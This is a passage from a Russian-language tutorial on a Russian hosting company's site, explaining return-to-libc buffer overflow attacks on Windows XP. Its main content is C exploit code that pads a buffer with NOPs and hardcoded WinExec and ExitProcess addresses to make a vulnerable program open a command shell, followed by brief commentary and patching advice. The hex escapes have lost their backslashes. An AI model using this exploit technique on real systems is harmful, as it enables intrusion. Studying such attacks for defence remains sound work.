Разработка динамических сайтов
SEO услуги
Управление контекстной рекламой

Вход на хостинг

Имя пользователя:*

Пароль пользователя:*

IT-новости

20.04.2016 iPhone 2017 года поместят в водонепроницаемый корпус из стекла

Линейка iPhone в новом году серьезно поменяется. В этом уверен аналитический исследователь Мин Чи Ку......

подробнее

30.07.2015 Ищем уникальный контент для сайта

Ищем уникальный контент для сайта Без уникального контента Ваш сайт обречен на то, что его страницы......

подробнее

11.05.2015 Распространённые ошибки разработчиков сайтов

Не секрет, что в сети Интернет насчитывается миллионы сайтов, и каждый день появляются тысячси новых......

подробнее

    char buffer[500];

 

    char r_address1[8]="xC6x84xE6x77";         // адрес функции WinExec для WIN XP

    char r_address2[8]="xB5x5CxE7x77";         // адрес функции ExitProcess для WIN XP

    char pointer_to_cmd[8]="x80xfax12x00";     // адрес строки "cmd" в стэке

    memset(garbage,'x90',256);                    // Заполняем строку мусором (nop)

    strcat(buffer,"cmd ");                         // "cmd "

    strcat(buffer,garbage);                        // "cmd "+nop

    strcat(buffer,r_address1);                     // "cmd "+nop+WinExec

    strcat(buffer,r_address2);                     // "cmd "+nop+WinExec+ExitProcess

    strcat(buffer,pointer_to_cmd);                 // "cmd "+nop+WinExec+ExitProcess+....

 

    strcpy(garbage,"BUG.EXE ");

    strcat(garbage,buffer);

   

    //"BUG.EXE "+"cmd "+nop'ы+WinExec+ExitProcess+point_cmd

 

    WinExec(buffer,1);

}

Как вы могли убедиться, для реализации данной атаки не нужно глубокое знание ассемблера для построения shell-кода. Она гораздо легче реализуется, чем традиционное переполнение буфера. Данный вид атаки на переполнение буфера гораздо более прогрессивный, но существует некоторая сложность построения удалённых эксплоитов данного типа.

По-моему, данная атака представляет собой второе дыхание эксплоитов, ориентированных на переполнение буфера.

Для борьбы с атаками данного вида системные администраторы должны с большим вниманием следить за обновлением программного обеспечения.

При написании статьи использовались материалы:

1. Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT/2000/XP by David Litchfield (david@ngssoftware.com).


Предыдущая страницаОглавлениеСледующая страница
 
[001] [002] [003] [004] [005] [006] [007] [008] [009] [010] [011] [012] [013] [014] [015] [016] [017] [018] [019] [020]
[021] [022] [023] [024] [025] [026] [027] [028] [029] [030] [031] [032] [033] [034] [035] [036] [037] [038] [039] [040]
[041] [042] [043] [044] [045] [046] [047] [048] [049] [050] [051] [052] [053] [054] [055] [056] [057] [058] [059] [060]
[061] [062] [063] [064] [065] [066] [067] [068] [069] [070] [071] [072] [073] [074] [075] [076] [077] [078] [079] [080]
[081] [082] [083] [084] [085] [086] [087] [088] [089] [090] [091] [092] [093] [094] [095] [096] [097] [098] [099] [100]
[101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120]
[121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140]
[141] [142] [143] [144] [145] [146] [147] [148] [149] [150]

+7 (831) 413-63-27
ООО Дельта-Технология ©2007 - 2016 год
Нижний Новгород, ул. Дальняя, 17А.
Rambler's Top100